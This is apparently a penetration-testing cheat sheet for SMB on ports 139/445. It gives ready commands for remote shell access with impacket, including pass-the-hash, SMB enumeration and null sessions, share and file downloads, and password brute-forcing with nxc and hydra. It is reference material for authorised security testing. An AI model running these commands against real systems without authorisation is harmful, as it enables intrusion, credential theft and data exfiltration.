# TCP: SMB - 139 / 445

## Connection

```bash
impacket-smbexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

{% code overflow="wrap" %}

```bash
impacket-smbexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

{% endcode %}

```bash
impacket-psexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

```bash
impacket-psexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

```bash
impacket-wmiexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

```bash
impacket-wmiexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

## Enumeration

### Identify Version

```bash
sudo nmap -p 139,445 -sV -Pn <Target IP Address>
```

{% code overflow="wrap" %}

```bash
tcpdump -i tun0 port <Port> and src <Target IP Address> -s0 -A -n 2>/dev/null & crackmapexec smb <Target IP Address> --shares --port <Port> 1>/dev/null 2>/dev/null
```

{% endcode %}

### Nmap

```bash
nmap --script "safe or smb-enum-*" -p 445 <Target IP Address>
```

```bash
nmap --script "smb-vuln*" -p 139,445 <Target IP Address>
```

### enum4linux

```bash
enum4linux -a <Target IP Address>
```

```bash
enum4linux -a <Target IP Address> -u <Username> -p <Password>
```

### smbclient

Null Session

```bash
smbclient -N -L //<Target IP Address>
```

List all shares

```bash
smbclient -L //<Target IP Address>/
```

Connecting to the particular share

```bash
smbclient //<Target IP Address>/<Share Name>/ -U [<Domain Name>\]<Username>
```

{% code overflow="wrap" %}

```bash
smbclient //<Target IP Address>/<Share Name>/ -U [<Domain Name>\]<Username> --pw-nt-hash <NTLM Hash>
```

{% endcode %}

List shares permission

```bash
smbmap -H <Target IP Address>
```

### smbget

Download target file

{% code overflow="wrap" %}

```bash
smbget smb://<Target IP Address>/<Share Name>/<File Name> [--user <Username>%<Password>]
```

{% endcode %}

Download target share

```bash
smbget -R smb://<Target IP Address>//<Share Name>
```

### crackmapexec

Enumerate SMB shares

```bash
crackmapexec smb <Target IP Address> [--users | --shares]
```

Null Authentication

```bash
crackmapexec smb <Target IP Address> --shares -u ' ' -p ''
```

```bash
crackmapexec smb <Target IP Address> --shares -u '' -p ''
```

To test if can authenticate

```bash
crackmapexec smb <Target IP Address> -u ' ' -p ''
```

Guest authentication

```bash
crackmapexec smb <Target IP Address> -u 'guest' -p ''
```

Checking authentication

Local User Authentication

```bash
crackmapexec smb <Target IP Address> -u <Username> -p <Password> --local-auth
```

Domain User Authentication

```bash
crackmapexec smb <Target IP Address> -u <Domain Name>\\<Username> -p <Password>
```

## Bruteforce

### nxc

{% code overflow="wrap" %}

```bash
nxc smb <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
```

{% endcode %}

{% code overflow="wrap" %}

```bash
nxc smb <Target IP Address> -d <Domain Name> -u <Username List> -H <Hashes List> --continue-on-success
```

{% endcode %}

### hydra

```bash
hydra -L <Username List> -P <Password List> -f smb://<Target IP Address> [-p <Port>]
```

```bash
hydra -l <Username> -p <Password> -f smb://<Target IP Address> [-p <Port>]
```